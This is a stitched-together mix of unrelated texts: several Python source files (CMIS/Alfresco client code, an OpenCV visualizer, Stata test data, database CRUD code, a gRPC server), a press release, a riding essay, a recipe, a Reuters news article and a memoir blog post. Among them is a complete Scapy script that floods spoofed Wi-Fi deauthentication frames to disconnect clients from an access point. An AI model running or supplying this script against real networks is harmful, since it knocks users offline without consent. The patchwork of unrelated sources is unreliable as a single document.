                    propertyName = node.attributes['propertyDefinitionId'].value
                    if node.childNodes and \
                       node.getElementsByTagNameNS(model.CMIS_NS, 'value')[0] and \
                       node.getElementsByTagNameNS(model.CMIS_NS, 'value')[0].childNodes:
                        valNodeList = node.getElementsByTagNameNS(
                            model.CMIS_NS, 'value')
                        if (len(valNodeList) == 1):
                            propertyValue = model.parsePropValue(
                                valNodeList[0].childNodes[0].data,
                                node.localName)
                        else:
                            propertyValue = []
                            for valNode in valNodeList:
                                propertyValue.append(model.parsePropValue(
                                    valNode.childNodes[0].data,
                                    node.localName))
                    else:
                        propertyValue = None
                    self._alfproperties[propertyName] = propertyValue
    result.update(self._alfproperties)
    return result


def updateProperties(self, properties):
    selfUrl = self._getSelfLink()
    cmisproperties = {}
    alfproperties = {}

    # if we have a change token, we must pass it back, per the spec
    args = {}
    if (self.properties.has_key(CHANGE_TOKEN) and
            self.properties[CHANGE_TOKEN] != None):
        self.logger.debug('Change token present, adding it to args')
        args = {"changeToken": self.properties[CHANGE_TOKEN]}

    objectTypeId = properties.get(OBJECT_TYPE_ID)
    if (objectTypeId is None):
        objectTypeId = self.properties.get(OBJECT_TYPE_ID)
    objectType = self._repository.getTypeDefinition(objectTypeId)
    objectTypePropsDef = objectType.getProperties()

    for propertyName, propertyValue in properties.items():
        if (propertyName == OBJECT_TYPE_ID) or \
           (propertyName in objectTypePropsDef.keys()):
            cmisproperties[propertyName] = propertyValue
        else:
            if self.findAspect(propertyName) is None:
                raise InvalidArgumentException
            else:
                alfproperties[propertyName] = propertyValue

    xmlEntryDoc = getEntryXmlDoc(self._repository, properties=cmisproperties)

    # Patch xmlEntryDoc
    # add alfresco properties
    if len(alfproperties) > 0:
        aspectsElement = addSetAspectsToXMLDocument(xmlEntryDoc)
        alfpropertiesElement = xmlEntryDoc.createElementNS(
            ALFRESCO_NS, TAGNAME_ALFRESCO_PROPERTIES)
        aspectsElement.appendChild(alfpropertiesElement)
        # Like regular properties
        addPropertiesToXMLElement(xmlEntryDoc, alfpropertiesElement,
                                  alfproperties)

    updatedXmlDoc = self._cmisClient.put(
        selfUrl.encode('utf-8'),
        xmlEntryDoc.toxml(encoding='utf-8'),
        model.ATOM_XML_TYPE,
        **args)
    self.xmlDoc = updatedXmlDoc
    self._initData()
    return self


def addAspect(self, arg):
    if arg is not None:
        aspect_id = arg
        if isinstance(arg, model.ObjectType):
            aspect_id = arg.getTypeId()
        if self._repository.getTypeDefinition(aspect_id) is None:
            raise InvalidArgumentException
        self._updateAspects(addAspects=aspect_id)


def removeAspect(self, arg):
    if arg is not None:
        aspect_id = arg
        if isinstance(arg, model.ObjectType):
            aspect_id = arg.getTypeId()
        if self._repository.getTypeDefinition(aspect_id) is None:
            raise InvalidArgumentException
        self._updateAspects(removeAspects=aspect_id)


def getEntryXmlDoc(repo=None, objectTypeId=None, properties=None,
                   contentFile=None, contentType=None, contentEncoding=None):
    return model.getEntryXmlDoc(repo, objectTypeId, properties, contentFile,
                                contentType, contentEncoding)
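The namespace-patching pattern used by `addSetAspectsToXMLDocument` can be sketched with plain `xml.dom.minidom` and literal namespace URIs standing in for the `model` constants (the entry XML below is a simplified stand-in, not a full CMIS Atom entry):

```python
from xml.dom import minidom

CMIS_NS = 'http://docs.oasis-open.org/ns/cmis/core/200908/'
ALFRESCO_NS = 'http://www.alfresco.org'

doc = minidom.parseString(
    '<entry xmlns="http://www.w3.org/2005/Atom" xmlns:cmis="%s">'
    '<cmis:properties/></entry>' % CMIS_NS)

# Declare the alf: prefix on the entry, as addSetAspectsToXMLDocument does
doc.documentElement.setAttribute('xmlns:alf', ALFRESCO_NS)

# Locate cmis:properties and hang alf:setAspects under it
props = doc.getElementsByTagNameNS(CMIS_NS, 'properties')[0]
aspects = doc.createElementNS(ALFRESCO_NS, 'alf:setAspects')
props.appendChild(aspects)

print(doc.documentElement.toxml())
```

Note that minidom's `createElementNS` records the namespace URI but serializes whatever qualified name you give it, which is why the `xmlns:alf` declaration must be added to the entry element by hand.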
Stuart, Florida – There’s never been a better time for people to upgrade their weary beds than with Bedding Stock’s Flash Sale. Kicking off deals starting Monday, October 01 through Wednesday, October 10, 2018, the bedding retailer is dropping the prices of all their mattresses by $200. “We want to help people get a good night’s sleep by purchasing from us without breaking an arm and a leg. With this flash sale, everyone can now purchase a new mattress without breaking a wallet,” said Steve Berke, co-founder of Bedding Stock.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#  visualize_classifier.py
#
#  Copyright 2016 Ramkumar Natarajan <ram@ramkumar-ubuntu>
#
#  This program is free software; you can redistribute it and/or modify
#  it under the terms of the GNU General Public License as published by
#  the Free Software Foundation; either version 2 of the License, or
#  (at your option) any later version.
#
#  This program is distributed in the hope that it will be useful,
#  but WITHOUT ANY WARRANTY; without even the implied warranty of
#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#  GNU General Public License for more details.
#
#  You should have received a copy of the GNU General Public License
#  along with this program; if not, write to the Free Software
#  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
#  MA 02110-1301, USA.
#
#

import os
import cv2
import argparse
import numpy as np
import xml.etree.ElementTree as ET

feats_per_stage = []
feats = []
tilted_per_feat = []
featID_in_stage = []
feat_img = []
scale_factor = 5


def improperXML():
    raise Exception('The classifier XML is not properly formatted. '
                    'Please verify whether you have given the correct '
                    'classifier.')


def main():
    parser = argparse.ArgumentParser(description="Visualize the HAAR features obtained from Opencv Cascade Classifier")
    parser.add_argument("classifier", help="The full path to the classifier ")
    parser.add_argument("overlay", help="Image on which the features should be overlaid.")
    parser.add_argument("dst", help="The path to save the visualization.")
    args = parser.parse_args()

    if os.path.splitext(args.classifier)[1] != '.xml':
        raise Exception('A non XML classifier is provided. Cannot be parsed! Aborting...')

    # Create classifier XML object for parsing through the XML
    obj = ET.parse(args.classifier).getroot()

    if obj.tag != 'opencv_storage':
        improperXML()

    '''
    for i in range(len(obj[0])):
        if obj[i].tag == 'cascade':
            for j in range(len(obj[i])):
                if obj[i][j].tag == 'stages':
                    for k in range(len(obj[i][j])):
                        if obj[i][j][k].tag == '_':
                            for l in range(len(obj[i][j][k])):
                                if obj[i][j][k][l].tag == 'maxWeakCount':
                                    feats_per_stage.append(int(obj[i][j][k][l].text))
    '''

    for i in obj.iter('width'):
        width = int(i.text)
    for i in obj.iter('height'):
        height = int(i.text)

    # Parse XML to collect weak classifiers per stage
    for i in obj.iter('stages'):
        for j in i.iter('maxWeakCount'):
            feats_per_stage.append(int(j.text))
    for i in obj.iter('stageNum'):
        assert(len(feats_per_stage) == int(i.text))

    # Parse XML to collect all the features in the classifier.
    for i in obj.iter('rects'):
        rect_in_feat = []
        for j in i.iter('_'):
            rect_in_feat.append(j.text.split())
        feats.append(rect_in_feat)

    # Parse XML to collect 'tilted' flag per feature
    for i in obj.iter('tilted'):
        tilted_per_feat.append(int(i.text))

    assert(sum(feats_per_stage) == len(feats))
    assert(sum(feats_per_stage) == len(tilted_per_feat))

    # Converting all the feature rectangle values into numpy images.
    for i in feats:
        haar = np.ones((height, width), dtype='u1') * 127
        for j in i:
            if float(j[-1]) < 0:
                haar[int(j[1]):(int(j[1]) + int(j[3])),
                     int(j[0]):(int(j[0]) + int(j[2]))] = 255
            else:
                haar[int(j[1]):(int(j[1]) + int(j[3])),
                     int(j[0]):(int(j[0]) + int(j[2]))] = 0
        feat_img.append(haar)

    overlay = cv2.resize(cv2.imread(args.overlay, 0),
                         (width * scale_factor, height * scale_factor),
                         fx=0, fy=0, interpolation=cv2.INTER_LINEAR)

    kk = 0
    for i in feat_img:
        res = cv2.resize(i, None, fx=scale_factor, fy=scale_factor,
                         interpolation=cv2.INTER_LINEAR)
        blend = cv2.addWeighted(overlay, 0.3, res, 0.7, 0)
        cv2.imshow('img', blend)
        cv2.waitKey(0)

    return 0


if __name__ == '__main__':
    main()
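The rectangle-to-image step above can be exercised on its own, without OpenCV or a real cascade file. This sketch uses two made-up rects in the same `[x, y, w, h, weight]` string format that `j.text.split()` produces, and renders them the same way: grey background, white for negative-weight regions, black for positive:

```python
import numpy as np

# Hypothetical 8x8 window with two toy rects (not from a real cascade)
rects = [['0', '0', '8', '4', '-1.'], ['0', '4', '8', '4', '2.']]
height = width = 8

haar = np.ones((height, width), dtype='u1') * 127  # grey background
for j in rects:
    x, y, w, h = (int(v) for v in j[:4])
    shade = 255 if float(j[-1]) < 0 else 0  # negative weight -> white region
    haar[y:y + h, x:x + w] = shade

print(haar[0, 0], haar[7, 7])  # 255 0
```

Here the top half of the window comes out white and the bottom half black, which is exactly the two-rect edge feature a Haar cascade stores.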
Silvio Mazzoni instructed me as I cantered a circle in preparation for a technical course he’d set up at a clinic in Southern California. I hadn’t been all that prepared to take a private lesson with the (at the time) U.S. Eventing Team’s show jumping coach, but my own coach’s generosity made it possible and, well, here we were. My horse and I had been schooling around Training level jump courses, but we struggled a lot with impulsion and staying in front of the leg. Life lessons, I’ve found, are best learned when you’re least prepared for them – and I was in for a big one. Silvio was all about rhythm and balance, not interfering too much with your horse while attempting to create a rhythm. Achieving a good rhythm, in my mind, is a bit like swinging your legs to gather momentum on a playground swing. It’s a steady build-up that requires help from all parts of your body – but once you’ve gotten to that rushing pendulum motion, you just need to maintain with some adjustments of your leg. Minor adjustments, mind you – overdo it and you risk losing your hard-earned momentum. Accurate, right? But, much easier said than done. Case in point during this lesson, where my horse – as game as he was – struggled to maintain a good pace, which caused a domino effect of poor distances and off-kilter turns. Silvio instructed me to lower my hands and lengthen my reins a bit, in more of a flowing, following motion, while encouraging my horse with a strong leg aid and then backing off – teaching him to respond steadily, like swinging. Take a feel, but don’t take away. Minor adjustments. The repeated reminders in my head almost helped me create that rhythm I so wanted. This accomplished two things. First, it helped me create a nice, strong, forward rhythm out of which my distances seemed to flow. Second, it helped teach my horse to respond instantly to my leg instead of after a few strides of constant prodding.
Think of it this way: you don’t get a swing going by sticking your legs straight out in front of you and pushing as hard as you can, do you? No. Rather, you swing, and then swoop, and swing, and then swoop. The same concept applies to your leg – apply and release, apply and release. Expect a reaction and thus, a steadier gain in momentum, with each application. My horse had a bit of a bewildered look in his eye, having been asked to go much more consistently forward than his previous days had required. But it paid off – our turns flowed, we landed more consistently on the correct lead, we didn’t lose (as much) momentum in the turns. Rhythm. The same concept can apply to any discipline – most issues, it seems, can fundamentally be at least helped by a bit more rhythm. It’s a thought I slid into my back pocket, for a later day when I was frustrated with my work, my riding, or any other sort of general life situation: put the pressure on, but don’t be afraid to back it off and release for a bit too – it’s all a part of creating something bigger.
#!/usr/bin/python

import argparse
import subprocess
from sys import exit
from scapy.all import *

# Credit: https://gist.githubusercontent.com/jordan-wright/4576966/raw/5f17c9bfb747d6b2b702df3630028a097be8f399/perform_deauth.py


def deauth(iface, ap, client, count, channel):
    subprocess.call(['iwconfig', iface, 'channel', str(channel)])
    pckt = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
    cli_to_ap_pckt = None
    if client != 'FF:FF:FF:FF:FF:FF':
        cli_to_ap_pckt = Dot11(addr1=ap, addr2=client, addr3=ap) / Dot11Deauth()
    print 'Sending Deauth to ' + client + ' from ' + ap
    if count == -1:
        print 'Press CTRL+C to quit'
    # We will do like aireplay does and send the packets in bursts of 64,
    # then sleep for half a sec or so
    while count != 0:
        try:
            for i in range(64):
                # Send out deauth from the AP
                send(pckt, iface=iface, verbose=0)
                print 'Sent deauth to ' + client
                # If we're targeting a client, we will also spoof deauth
                # from the client to the AP
                if client != 'FF:FF:FF:FF:FF:FF':
                    send(cli_to_ap_pckt, iface=iface, verbose=0)
            # If count was -1, this will be an infinite loop
            count -= 1
        except KeyboardInterrupt:
            break


def main():
    parser = argparse.ArgumentParser(description='deauth.py - Deauthenticate clients from a network')
    parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='Interface to use for deauth')
    parser.add_argument('-a', '--ap', dest='ap', type=str, required=True, help='BSSID of the access point')
    parser.add_argument('-c', '--client', dest='client', type=str, required=True, help='BSSID of the client being DeAuthenticated')
    parser.add_argument('-n', '--packets', dest='count', type=int, required=False, default=-1, help='Number of DeAuthentication packets to send')
    parser.add_argument('-ch', '--channel', dest='channel', type=int, required=True, help='Channel which AP and client are on')
    args = parser.parse_args()
    deauth(args.iface, args.ap, args.client, args.count, args.channel)
    exit(0)


if __name__ == '__main__':
    main()
Despite the readily available ingredients and simple preparation, this salad cannot be called ordinary. Its highlight is a special honey-mustard sauce. It is this dressing that lends the dish sophistication and makes familiar products play with new flavors. Red (or green) "Dubok" lettuce leaves - 200 g. Chicken fillet - 200 g. Fresh tomato - 1-2 pcs. Brie cheese - 50 g. Olive oil - 2 tbsp. Wash the chicken fillet and cut it into several pieces so that the meat cooks more quickly. Cover with water and cook over medium heat for 20-25 minutes. While the fillet cools, prepare the lettuce leaves: rinse and chop them. On a note! It is better to tear lettuce leaves with your hands rather than cut them with a knife; this preserves their airiness and volume. Cut the tomatoes into thin slices. You can also use small cocktail tomatoes for this salad. Pull the cooled boiled fillet apart into fibers or cut it into small strips. Cut the brie into small pieces with a knife or a vegetable cutter. Mix the greens, meat, tomato, and cheese. On a note! Instead of tomatoes, you can use other vegetables: cucumber, sweet pepper, cauliflower. If you like sweet salads, you can add canned pineapple to the original recipe. The base is ready; all that remains is to prepare a delicious dressing, because plain olive oil is a bit boring, and you want something new and interesting to taste. For such a dietary salad, it is best to prepare a moderately sharp honey-mustard dressing. To make the sauce, mix olive oil, mustard, honey, salt, and pepper, then squeeze in a little garlic and stir gently. Pour the dressing over the salad and mix thoroughly. You can also add a teaspoon of sesame seeds to decorate the dish and enhance its benefits.
import numpy as np

cov_clu_stata = np.array([
    .00025262993207, -.00065043385106, .20961897960949,
    -.00065043385106, .00721940994738, -1.2171040967615,
    .20961897960949, -1.2171040967615, 417.18890043724]).reshape(3, 3)

cov_pnw0_stata = np.array([
    .00004638910396, -.00006781406833, -.00501232990882,
    -.00006781406833, .00238784043122, -.49683062350622,
    -.00501232990882, -.49683062350622, 133.97367476797]).reshape(3, 3)

cov_pnw1_stata = np.array([
    .00007381482253, -.00009936717692, -.00613513582975,
    -.00009936717692, .00341979122583, -.70768252183061,
    -.00613513582975, -.70768252183061, 197.31345000598]).reshape(3, 3)

cov_pnw4_stata = np.array([
    .0001305958131, -.00022910455176, .00889686530849,
    -.00022910455176, .00468152667913, -.88403667445531,
    .00889686530849, -.88403667445531, 261.76140136858]).reshape(3, 3)

cov_dk0_stata = np.array([
    .00005883478135, -.00011241470772, -.01670183921469,
    -.00011241470772, .00140649264687, -.29263014921586,
    -.01670183921469, -.29263014921586, 99.248049966902]).reshape(3, 3)

cov_dk1_stata = np.array([
    .00009855800275, -.00018443722054, -.03257408922788,
    -.00018443722054, .00205106413403, -.3943459697384,
    -.03257408922788, -.3943459697384, 140.50692606398]).reshape(3, 3)

cov_dk4_stata = np.array([
    .00018052657317, -.00035661054613, -.06728261073866,
    -.00035661054613, .0024312795189, -.32394785247278,
    -.06728261073866, -.32394785247278, 148.60456447156]).reshape(3, 3)


class Bunch(dict):
    def __init__(self, **kw):
        dict.__init__(self, kw)
        self.__dict__ = self


results = Bunch(cov_clu_stata=cov_clu_stata,
                cov_pnw0_stata=cov_pnw0_stata,
                cov_pnw1_stata=cov_pnw1_stata,
                cov_pnw4_stata=cov_pnw4_stata,
                cov_dk0_stata=cov_dk0_stata,
                cov_dk1_stata=cov_dk1_stata,
                cov_dk4_stata=cov_dk4_stata,
                )
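The `Bunch` container above makes each result reachable both as a dict key and as an attribute, because it points its `__dict__` at itself. A minimal standalone sketch of that access pattern (the `cov` and `name` fields here are made up for illustration):

```python
class Bunch(dict):
    """dict whose keys are also readable as attributes."""
    def __init__(self, **kw):
        dict.__init__(self, kw)
        self.__dict__ = self


res = Bunch(cov=[[1.0, 0.0], [0.0, 1.0]], name="demo")

# Attribute access and key access hit the same storage
print(res.name)               # demo
print(res.cov is res["cov"])  # True
```

This is the same trick statsmodels-style results modules use so test code can write `results.cov_clu_stata` instead of `results["cov_clu_stata"]`.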
BRASILIA (Reuters) – Brazil complained on Thursday that Venezuela was doing nothing to stop the spread of an outbreak of measles in Brazil and other neighboring countries that has been sparked by an exodus of Venezuelans fleeing economic collapse. Since February, four people – three of them Venezuelan – have died of measles in the remote Brazilian border state of Roraima where health authorities have confirmed 281 cases of the disease, mostly among children. The outbreak has prompted the Brazilian government to launch a nationwide campaign to vaccinate 11 million children, plus adults who request it. Although many Brazilian children are already vaccinated against the disease, the vaccination rate has dropped since Brazil was declared free of measles in 2016. Brazil’s Health Minister Gilberto Occhi said Venezuela had ignored Brazilian offers of assistance and vaccines and had not replied to requests for information to assess the extent of the epidemic. “We need to know what Venezuela’s policy is and what it has done to vaccinate its population, and so do other countries,” Occhi said in a conference call with foreign media. Occhi said Brazil was considering vaccinating all Venezuelans entering the country – some 2,000 people a day, with around half of those in transit or on a short-term visit. Currently only those that ask to stay as refugees or residents are vaccinated. Brazil, along with Colombia and other neighbors, has been discussing the need for Venezuela to provide up-to-date information with the Pan American Health Organization (PAHO), an official said. “All we have is preliminary data from 2017. They are not updating the information and we can’t see the magnitude of the problem,” said Carla Domingues, head of Brazil’s immunization program. PAHO said last month that nearly 2,500 confirmed cases of measles had been reported in the Americas in 2018, with over 1,600 of those occurring in Venezuela and nearly 700 in Brazil. 
Since Venezuelans fleeing economic and political turmoil started entering Roraima at the only land crossing three years ago, Brazil has vaccinated 45,000 arrivals. A decree by Roraima state government ordering the compulsory blanket vaccination of Venezuelans was struck down by the Supreme Court this week. Measles vaccination in Brazil fell to around 70 percent coverage in 2017, a ministry official said.
# encoding=utf-8
import psycopg2

__author__ = 'Hinsteny'


def get_conn():
    conn = psycopg2.connect(database="hello_db", user="hinsteny",
                            password="welcome", host="127.0.0.1", port="5432")
    return conn


def create_table(conn):
    cur = conn.cursor()
    cur.execute('''CREATE TABLE if not exists COMPANY
        (ID      INT  PRIMARY KEY NOT NULL,
         NAME    TEXT             NOT NULL,
         AGE     INT              NOT NULL,
         ADDRESS CHAR(50),
         SALARY  REAL);''')
    conn.commit()
    conn.close()


def insert_data(conn):
    cur = conn.cursor()
    cur.execute("INSERT INTO COMPANY (ID,NAME,AGE,ADDRESS,SALARY) \
        VALUES (1, 'Paul', 32, 'California', 20000.00)")
    cur.execute("INSERT INTO COMPANY (ID,NAME,AGE,ADDRESS,SALARY) \
        VALUES (2, 'Allen', 25, 'Texas', 15000.00)")
    cur.execute("INSERT INTO COMPANY (ID,NAME,AGE,ADDRESS,SALARY) \
        VALUES (3, 'Teddy', 23, 'Norway', 20000.00)")
    cur.execute("INSERT INTO COMPANY (ID,NAME,AGE,ADDRESS,SALARY) \
        VALUES (4, 'Mark', 25, 'Rich-Mond', 65000.00)")
    conn.commit()
    print("Records created successfully")
    conn.close()


def select_data(conn):
    cur = conn.cursor()
    cur.execute("SELECT id, name, address, salary from COMPANY ORDER BY id ASC;")
    rows = cur.fetchall()
    for row in rows:
        print("ID = ", row[0])
        print("NAME = ", row[1])
        print("ADDRESS = ", row[2])
        print("SALARY = ", row[3], "\n")
    print("Operation done successfully")
    conn.close()


def update_data(conn):
    cur = conn.cursor()
    cur.execute("UPDATE COMPANY set SALARY = 50000.00 where ID=1;")
    conn.commit()
    conn.close()
    select_data(get_conn())


def delete_data(conn):
    cur = conn.cursor()
    cur.execute("DELETE from COMPANY where ID=4;")
    conn.commit()
    conn.close()
    select_data(get_conn())


# Do test
if __name__ == "__main__":
    create_table(get_conn())
    insert_data(get_conn())
    select_data(get_conn())
    update_data(get_conn())
    delete_data(get_conn())
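The inserts above hard-code the values into the SQL strings. With psycopg2 you would normally pass the values separately via `%s` placeholders (`cur.execute(sql, params)`), which lets the driver handle quoting. A minimal sketch of that pattern, demonstrated with the stdlib `sqlite3` module (which uses `?` placeholders) so it runs without a PostgreSQL server — the table and rows here are illustrative:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE company (id INTEGER PRIMARY KEY, name TEXT, salary REAL)")

# Values travel separately from the SQL text; the driver handles quoting
rows = [(1, "Paul", 20000.00), (2, "Allen", 15000.00)]
cur.executemany("INSERT INTO company (id, name, salary) VALUES (?, ?, ?)", rows)
conn.commit()

cur.execute("SELECT name FROM company WHERE salary > ?", (16000,))
print(cur.fetchall())  # [('Paul',)]
```

The same code shape works with psycopg2 by swapping the connection call and the `?` markers for `%s`.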
Again, thanks to Amy (at The World Is A Book…) for inviting me to participate in the “3 Days, 3 Quotes” challenge — post a quote each day for 3 days and nominate 3 new bloggers each day to take part. At my mom’s funeral, the person who cried the loudest was one of her grandsons. Mom had taken care of 8 of her 10 grandchildren when they were little. All my siblings and I worked full-time, so whenever one of us had a baby, Mom went to his or her house to help. When a grandkid grew a little older, every morning she would watch him or her get on the school bus, and later welcome him or her back home. She never got paid, never took a sick leave, and never complained. This entry was posted in 3 Quotes, Memoir. Bookmark the permalink. I’m reading with tears in my eyes…. Thank you for sharing the quote and story. Thanks, Amy. I didn’t realize how difficult what my mom had done was until I was the age she was when she took care of her first grandchild — not to mention she did it for 7 more after that. I was happy with how this photo turned out, and I learned how to post a quote today. I am very happy. Thanks! What a lovely picture! Just today I was talking to a friend about the very special relationship that exists between grandparents and grandchildren. Lucky are those who get to experience it. I totally agree with you, Joanne. I never met my grandparents. For a long time, we (people in Taiwan) were not allowed to contact people in mainland China. By the time we finally could, my grandparents had passed away. Lucky are those who get to experience it — exactly! Awww – that’s really sad, Helen. It must have been terrible for your grandparents too. What a beautiful photo, Helen. The intensity in your niece’s eyes as she looks at your mother… just wonderful. Excellent quote to go with your mother’s photo. What a wonderful tribute. There’s a saying that only good mothers can become great grandmothers. I bet your mother is proof of this! Thanks, Perpetua. Yes, my mom was (is) a wonderful grandmother!
I remember wishing I were her grandchild. Ha. Pingback: 3 Days, 3 Quotes (Day 2) | ….on pets and prisoners….. Thank you, Dawn. I read that you had been very busy lately. I hope the busy day is over or will be over soon. Take care.
#!/usr/bin/env python
import time
import logging
import json
from concurrent import futures

import grpc

from grpc_ssm import opac_pb2
from grpc_health.v1 import health
from grpc_health.v1 import health_pb2

from celery.result import AsyncResult

from assets_manager import tasks
from assets_manager import models

MAX_RECEIVE_MESSAGE_LENGTH = 90 * 1024 * 1024
MAX_SEND_MESSAGE_LENGTH = 90 * 1024 * 1024


class Asset(opac_pb2.AssetServiceServicer):

    def add_asset(self, request, context):
        """Return a task id"""
        task_result = tasks.add_asset.delay(request.file, request.filename,
                                            request.type, request.metadata,
                                            request.bucket)
        return opac_pb2.TaskId(id=task_result.id)

    def get_asset(self, request, context):
        """Return an Asset, or an error message when the asset does not exist"""
        try:
            asset = models.Asset.objects.get(uuid=request.id)
        except models.Asset.DoesNotExist as e:
            logging.error(str(e))
            context.set_details(str(e))
            raise
        else:
            try:
                fp = open(asset.file.path, 'rb')
            except IOError as e:
                logging.error(str(e))
                context.set_details(str(e))
                raise

            return opac_pb2.Asset(file=fp.read(),
                                  filename=asset.filename,
                                  type=asset.type,
                                  metadata=json.dumps(asset.metadata),
                                  uuid=asset.uuid.hex,
                                  bucket=asset.bucket.name,
                                  checksum=asset.checksum,
                                  absolute_url=asset.get_absolute_url,
                                  full_absolute_url=asset.get_full_absolute_url,
                                  created_at=asset.created_at.isoformat(),
                                  updated_at=asset.updated_at.isoformat())

    def update_asset(self, request, context):
        """Return a task id"""
        task_result = tasks.update_asset.delay(request.uuid, request.file,
                                               request.filename, request.type,
                                               request.metadata, request.bucket)
        return opac_pb2.TaskId(id=task_result.id)

    def remove_asset(self, request, context):
        """Return an AssetRemoved"""
        result = tasks.remove_asset(asset_uuid=request.id)
        return opac_pb2.AssetRemoved(exist=result)

    def exists_asset(self, request, context):
        """Return an AssetExists"""
        result = tasks.exists_asset(asset_uuid=request.id)
        return opac_pb2.AssetExists(exist=result)

    def get_task_state(self, request, context):
        """Return a task state"""
        res = AsyncResult(request.id)
        return opac_pb2.TaskState(state=res.state)

    def get_asset_info(self, request, context):
        """Return an Asset info"""
        try:
            asset = models.Asset.objects.get(uuid=request.id)
        except models.Asset.DoesNotExist as e:
            logging.error(str(e))
            context.set_details(str(e))
            raise
        else:
            return opac_pb2.AssetInfo(url=asset.get_full_absolute_url,
                                      url_path=asset.get_absolute_url)

    def get_bucket(self, request, context):
        """Return the bucket of an asset"""
        try:
            asset = models.Asset.objects.get(uuid=request.id)
        except models.Asset.DoesNotExist as e:
            logging.error(str(e))
            context.set_details(str(e))
            raise
        else:
            return opac_pb2.Bucket(name=asset.bucket.name)

    def query(self, request, context):
        """Return a list of assets matching the given filters"""
        asset_list = []
        assets = opac_pb2.Assets()

        filters = {}
        if request.checksum:
            filters['checksum'] = request.checksum
        if request.filename:
            filters['filename'] = request.filename
        if request.type:
            filters['type'] = request.type
        if request.uuid:
            filters['uuid'] = request.uuid
        if request.bucket:
            filters['bucket'] = request.bucket

        result = tasks.query(filters, metadata=request.metadata)

        for ret in result:
            asset = opac_pb2.Asset()
            asset.filename = ret.filename
            asset.type = ret.type
            asset.metadata = json.dumps(ret.metadata)
            asset.uuid = ret.uuid.hex
            asset.checksum = ret.checksum
            asset.bucket = ret.bucket.name
            asset.absolute_url = ret.get_absolute_url
            asset.full_absolute_url = ret.get_full_absolute_url
            asset.created_at = ret.created_at.isoformat()
            asset.updated_at = ret.updated_at.isoformat()
            asset_list.append(asset)

        assets.assets.extend(asset_list)
        return assets


class AssetBucket(opac_pb2.BucketServiceServicer):

    def add_bucket(self, request, context):
        """Return a task id"""
        task_result = tasks.add_bucket.delay(bucket_name=request.name)
        return opac_pb2.TaskId(id=task_result.id)

    def update_bucket(self, request, context):
        """Return a task id"""
        task_result = tasks.update_bucket.delay(bucket_name=request.name,
                                                new_name=request.new_name)
        return opac_pb2.TaskId(id=task_result.id)

    def remove_bucket(self, request, context):
        """Return a BucketRemoved"""
        result = tasks.remove_bucket(bucket_name=request.name)
        return opac_pb2.BucketRemoved(exist=result)

    def exists_bucket(self, request, context):
        """Return a BucketExists"""
        result = tasks.exists_bucket(bucket_name=request.name)
        return opac_pb2.BucketExists(exist=result)

    def get_task_state(self, request, context):
        """Return a task state"""
        res = AsyncResult(request.id)
        return opac_pb2.TaskState(state=res.state)

    def get_assets(self, request, context):
        """Return the list of assets in a bucket"""
        asset_list = []
        # We must return an object of type Assets
        assets = opac_pb2.Assets()

        result = models.Asset.objects.filter(bucket__name=request.name)

        for ret in result:
            asset = opac_pb2.Asset()
            asset.file = ret.file.read()
            asset.filename = ret.filename
            asset.type = ret.type
            asset.metadata = json.dumps(ret.metadata)
            asset.uuid = ret.uuid.hex
            asset.checksum = ret.checksum
            asset.bucket = ret.bucket.name
            asset.absolute_url = ret.get_absolute_url
            asset.full_absolute_url = ret.get_full_absolute_url
            asset.created_at = ret.created_at.isoformat()
            asset.updated_at = ret.updated_at.isoformat()
            asset_list.append(asset)

        assets.assets.extend(asset_list)
        return assets


def serve(host='[::]', port=5000, max_workers=4,
          max_receive_message_length=MAX_RECEIVE_MESSAGE_LENGTH,
          max_send_message_length=MAX_SEND_MESSAGE_LENGTH):

    servicer = health.HealthServicer()
    servicer.set('', health_pb2.HealthCheckResponse.SERVING)

    # Asset
    servicer.set('get_asset', health_pb2.HealthCheckResponse.SERVING)
    servicer.set('add_asset', health_pb2.HealthCheckResponse.SERVING)
    servicer.set('update_asset', health_pb2.HealthCheckResponse.SERVING)
    servicer.set('remove_asset', health_pb2.HealthCheckResponse.SERVING)
    servicer.set('exists_asset', health_pb2.HealthCheckResponse.SERVING)
    servicer.set('get_asset_info', health_pb2.HealthCheckResponse.SERVING)
    servicer.set('get_task_state', health_pb2.HealthCheckResponse.SERVING)
    servicer.set('get_bucket', health_pb2.HealthCheckResponse.SERVING)
    servicer.set('query', health_pb2.HealthCheckResponse.SERVING)

    # Bucket
    servicer.set('add_bucket', health_pb2.HealthCheckResponse.SERVING)
    servicer.set('update_bucket', health_pb2.HealthCheckResponse.SERVING)
    servicer.set('remove_bucket', health_pb2.HealthCheckResponse.SERVING)
    servicer.set('exists_bucket', health_pb2.HealthCheckResponse.SERVING)
    servicer.set('get_assets', health_pb2.HealthCheckResponse.SERVING)

    options = [('grpc.max_receive_message_length', max_receive_message_length),
               ('grpc.max_send_message_length', max_send_message_length)]

    server = grpc.server(futures.ThreadPoolExecutor(max_workers=max_workers),
                         options=options)

    opac_pb2.add_AssetServiceServicer_to_server(Asset(), server)
    opac_pb2.add_BucketServiceServicer_to_server(AssetBucket(), server)

    # Health service
    health_pb2.add_HealthServicer_to_server(servicer, server)

    # Set port and start server
    server.add_insecure_port('{0}:{1}'.format(host, port))
    server.start()

    logging.info('Started GRPC server on localhost, port: {0}, accepting connections!'.format(port))

    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        logging.info('User stopping server...')
        server.stop(0)
        logging.info('Server stopped; exiting.')
    except Exception as e:
        logging.info('Caught exception "%s"; stopping server...', e)
        server.stop(0)
        logging.info('Server stopped; exiting.')


if __name__ == '__main__':
    serve()
